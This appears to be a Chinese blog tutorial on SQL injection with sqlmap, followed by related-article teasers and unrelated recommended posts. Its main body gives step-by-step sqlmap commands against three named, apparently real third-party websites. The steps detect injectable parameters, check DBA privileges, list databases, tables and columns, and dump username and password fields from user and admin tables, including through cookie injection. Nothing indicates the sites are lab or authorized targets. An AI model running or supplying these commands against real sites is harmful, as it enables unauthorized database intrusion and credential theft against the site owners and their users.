*教程

http://www.nxadmin.com/tools/1241.html

一、ASP网站

1.

sqlmap -u “http://www.czypjx.com/News_show.asp?id=110

-u  “检测是否存在注入”

  返回数据库的名字

查看数据库信息及是否存在注入漏洞(绿色可以注入,黄色不可)

2.

sqlmap -u “http://www.czypjx.com/News_show.asp?id=110”   --tables

猜解出所有表名

选择"user" "admin"

3.

sqlmap -u "http://www.czypjx.com/News_show.asp?id=110" --columns -T "user"

--columns   猜列名  根据user表

4.

sqlmap -u "http://www.czypjx.com/News_show.asp?id=110" --dump -C "username,password" -T "user"

--dump  下载数据      -C “username,password” 列名

二、PHP网站(一般是mysql的数据库)

1. 检测

sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”

2.是否dba权限

sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”  --is-dba

3.列出所有数据库

sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”  --dbs

4.查找自己的数据库

sqlmap -u “http://www.ggec.com.cn/oneNews.php?id=69”  --current-db

5.查询所有表名

sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69" --tables -D "ggec"

查询所有表名, 根据ggec数据库来查询

6.查询所有的列

sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69"  --colums -T “ggec_admin” -D "ggec"

“ggec_admin”是选择的表名

7.查询列的字段

sqlmap -u "http://www.ggec.com.cn/oneNews.php?id=69"  --dump -C “username,password” -T “ggec_admin” -D "ggec"

三、ASP网站的Cookie注入

1.

sqlmap -u "http://www.wisefund.com.cn/about.asp?id=56

显示不能注入

修改为

sqlmap -u “http://www.wisefund.com.cn/about.asp  ” --cookie “id=56” --level 2

--cookie  “”  这里写ID的参数

有时这样就可以注入了

2.

sqlmap -u “http://www.wisefund.com.cn/about.asp  ” --tables --cookie “id=56” --level 2

3.

sqlmap -u “http://www.wisefund.com.cn/about.asp  ” --columns -T “user” --cookie “id=56” --level 2

4.

sqlmap -u “http://www.wisefund.com.cn/about.asp  ”--dump  -C “username,password” -T “user” --cookie “id=56” --level 2

*参考

http://wenku.baidu.com/link?url=2KJ2bgLFI3Fhknk0Pr3fAlMDmLr-jqG6fD9FaBdLqTFbNnHyVLy-NIjpgm5RsBDVoegjVFw1GAqg_QdgqljPUWKcvNyGFLIEVw3aj9ZuYwa

http://drops.wooyun.org/tips/143

http://it.100xuexi.com/view/otdetail/20131031/8158cdfa-e485-46f9-8067-a4ad4891d267.html

http://www.cnblogs.com/hongfei/p/3872156.html

sqlmap(网站数据库注入)的更多相关文章

  1. SQLMAP学习笔记2 Mysql数据库注入

    SQLMAP学习笔记2 Mysql数据库注入 注入流程 (如果网站需要登录,就要用到cookie信息,通过F12开发者工具获取cookie信息) sqlmap -u "URL" - ...

  2. CentOS 7 通过SQLmap进行SQL注入

    安装SQLmap: IP:192.168.94.11 渗透测试演练系统DVWA: IP:192.168.94.111 通过SQLmap检测SQL注入漏洞 : 1.安装SQLmap漏洞查看工具 2.安装 ...

  3. Access+Mssql+Oracle数据库注入

    Access数据库注入 前言:在常见的注入测试中,由于每个数据库内置架构和应用不同,导致数据库类型将决定注入的手法,Access数据库是小型数据库类型,普遍用于小型WEB应用,其中Access注入手法 ...

  4. SqlMap之数据库操作语句总结

    SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据.我们可以利用它执行特定的命令.查看文件.获取各种数据:当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满 ...

  5. 结合sqlmap进行sql注入过程

    结合sqlmap进行sql注入:(-r后面是通过burp suite抓出来的请求包:-p后面是注入点,即该请求里携带的某个参数) Get请求的注入: ./sqlmap.py -r rss_test.t ...

  6. 【阿里云产品公测】利用PTS服务优化网站数据库读写性能

    [阿里云产品公测]利用PTS服务优化网站数据库读写性能 作者:阿里云用户千鸟 写这个帖子主要也是因为在用PTS测试网站的时候,手动访问网站进入报错页面,主要原因是数据库连接对象存在问题,导致并发多的时 ...

  7. discuz网站数据库迁移

    你的discuz网站数据库迁移,或者修改过改密码后,还要以下相关配置文件修改,才能不会出现1045错误 以windows系统为例:首先登陆远程桌面,在运行中输入cmd,单开命令模式,再输入  net ...

  8. Atitit.故障排除系列---php 程序网站数据库错误排除流程

    Atitit.故障排除系列---php 程序网站数据库错误排除流程 Php页面报告的错误不能定位到myusql的db配置上...字说是db conn err Mysql 接入错误...大概查看哈能不能 ...

  9. Atitit.故障排除系列---php 计划网站数据库错误排除过程

    Atitit.故障排除系列---php 计划网站数据库错误排除过程 Php页面报告的错误不能定位到myusql的db配置上...字说是db conn err Mysql 接入错误...大概查看哈能不能 ...

随机推荐

  1. Docker:18.x版本安装与卸载

    Docker CE 分为 stable, test, 和 nightly 三个更新频道.每六个月发布一个 stable 版本 初始化机器 #1.关闭警报 vi /etc/inputrc #然后将set ...

  2. 024_STM32程序移植之_ESP8266_TCP

    (一)实验目的:编写电脑软件通过ESP8266传输数据给STM32的,下面这张图 (二)上面只是简单地图,视频比较全面 视频教程:https://v.qq.com/x/page/o0829zs7iop ...

  3. STS工具各版本下载网址

    官网网址:https://spring.io/tools3/sts/legacy

  4. react 后台(一)react + redux + react-route + webpack+ axios + antd+styled-components(替代less)

    create-react-app my-admin 项目技术栈 react + redux + react-route + webpack+ axios + antd+styled-component ...

  5. wamp大文件上传

    为什么上传大文件总是失败,但是上传小文件就没有问题.小编也不得其解,网上搜其原因,整理了一篇关于php上传大文件失败的原因和解决办法的文章,分享给大家. 下面分别是各种原因以及解决办法:第1种情况:文 ...

  6. 校庆神秘建筑(HDU 1411)

    Problem 杭州电子科技大学即将迎来50周年的校庆,作为校庆委员会成员的我被上级要求设计一座神秘的建筑物来迎合校庆,因此我苦思冥想了一个月,终于设计出了一套方案,这座建筑物有点象古老埃及的金字塔, ...

  7. npm传参技巧

    博主今天遇到一个问题,使用vue-cli-serve,想要用shelljs来执行vue-cli-serve,动态给它传“--port xxxx"但是发现”--port“怎么传都穿不进去,后面 ...

  8. Java并发指南2:深入理解Java内存模型JMM

    本文转载自互联网,侵删   一:JMM基础与happens-before 并发编程模型的分类 在并发编程中,我们需要处理两个关键问题:线程之间如何通信及线程之间如何同步(这里的线程是指并发执行的活动实 ...

  9. YouTube 网站的架构演进——阅读心得

    基础平台 Apache Python Linux(SuSe) MySQL psyco,一个动态的Python到C的编译器 lighttpd代替Apache做视频播放 状态 支持每天超过5亿的视频点击量 ...

  10. 飞行姿态角度表示: heading pitch roll

    //创建初始化摄像机视图 var initialPosition=new Cesium.Cartesian3.fromDegrees(-73.998114468289017509, 40.674512 ...